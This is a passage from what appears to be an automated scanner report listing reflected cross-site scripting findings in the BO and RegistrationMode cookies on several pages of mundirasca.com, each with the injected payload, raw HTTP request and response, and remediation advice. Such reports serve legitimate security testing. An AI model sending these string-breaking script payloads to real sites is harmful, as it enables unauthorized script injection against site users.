<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMd14ae"-alert(1)-"37554d0d6f9";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.307. http://www.mundirasca.com/InviteFriend.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6f07"-alert(1)-"d5b1ce0562e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMb6f07"-alert(1)-"d5b1ce0562e; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/
Set-Cookie: BO=FMb6f07"-alert(1)-"d5b1ce0562e; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb6f07"-alert(1)-"d5b1ce0562e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.308. http://www.mundirasca.com/InviteFriend.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1384a"-alert(1)-"4fa8e8c2447 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM1384a"-alert(1)-"4fa8e8c2447; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM1384a"-alert(1)-"4fa8e8c2447; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM1384a"-alert(1)-"4fa8e8c2447";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.309. http://www.mundirasca.com/PlayersClub.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1a56"-alert(1)-"3cfbf31ac84 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMe1a56"-alert(1)-"3cfbf31ac84; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: BO=FMe1a56"-alert(1)-"3cfbf31ac84; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe1a56"-alert(1)-"3cfbf31ac84";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.310. http://www.mundirasca.com/PlayersClub.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 261b0"-alert(1)-"49a35498dd0 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM261b0"-alert(1)-"49a35498dd0; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM261b0"-alert(1)-"49a35498dd0; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM261b0"-alert(1)-"49a35498dd0";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.311. http://www.mundirasca.com/Promotions.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c1e4"-alert(1)-"0007f7cf4fd was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM7c1e4"-alert(1)-"0007f7cf4fd; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/
Set-Cookie: BO=FM7c1e4"-alert(1)-"0007f7cf4fd; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM7c1e4"-alert(1)-"0007f7cf4fd";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.312. http://www.mundirasca.com/Promotions.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed3a6"-alert(1)-"9f4d4b544fd was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PMed3a6"-alert(1)-"9f4d4b544fd; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMed3a6"-alert(1)-"9f4d4b544fd; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMed3a6"-alert(1)-"9f4d4b544fd";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.313. http://www.mundirasca.com/Responsible.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 594bd"-alert(1)-"42dce1566b9 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM594bd"-alert(1)-"42dce1566b9; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: BO=FM594bd"-alert(1)-"42dce1566b9; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM594bd"-alert(1)-"42dce1566b9";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.314. http://www.mundirasca.com/Responsible.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e850"-alert(1)-"202963a5420 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM3e850"-alert(1)-"202963a5420; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM3e850"-alert(1)-"202963a5420; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM3e850"-alert(1)-"202963a5420";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.315. http://www.mundirasca.com/SecurityAndPrivacy.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eed7e"-alert(1)-"ec4303889bc was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMeed7e"-alert(1)-"ec4303889bc; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: BO=FMeed7e"-alert(1)-"ec4303889bc; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36037


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMeed7e"-alert(1)-"ec4303889bc";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.316. http://www.mundirasca.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e19c"-alert(1)-"c11a7558480 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
